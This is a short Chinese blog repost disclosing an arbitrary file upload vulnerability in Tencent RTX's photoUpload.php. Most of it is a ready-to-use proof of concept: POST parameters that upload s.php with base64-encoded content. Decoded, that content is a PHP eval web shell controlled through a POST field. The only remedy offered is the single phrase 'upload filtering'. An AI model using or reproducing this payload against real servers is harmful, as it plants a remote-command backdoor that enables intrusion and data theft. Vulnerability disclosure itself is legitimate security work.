腾讯RTX上传任意文件及修复

最新推荐文章于 2019-07-25 11:37:14 发布

weixin_34413065

最新推荐文章于 2019-07-25 11:37:14 发布

阅读量335

点赞数

文章标签： php

原文链接：http://blog.51cto.com/hellxman/734105

版权

安装RTX后打开IP:8012网址

腾讯RTX存在UserPhoto/photoUpload.php任意文件上传漏洞

详细说明：

简单的一个post表单即可上传

$user_account = $_POST['user_account'];

$file_name = $_POST["file_name"];

$file_data = $_POST["file_data"];

无任何过滤

漏洞证明：

user_account=1000

file_name=s.php

file_data=PD9waHAgZXZhbCgkX1BPU1Rbc2JdKT8+

file_data为base64_encode数据

post提交后UserPhoto目录下生成PhotoFiles/s.php

需要extension=php_mbstring.dll开启及php4

修复方案：

上传过滤

转载于:https://blog.51cto.com/hellxman/734105

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

关注关注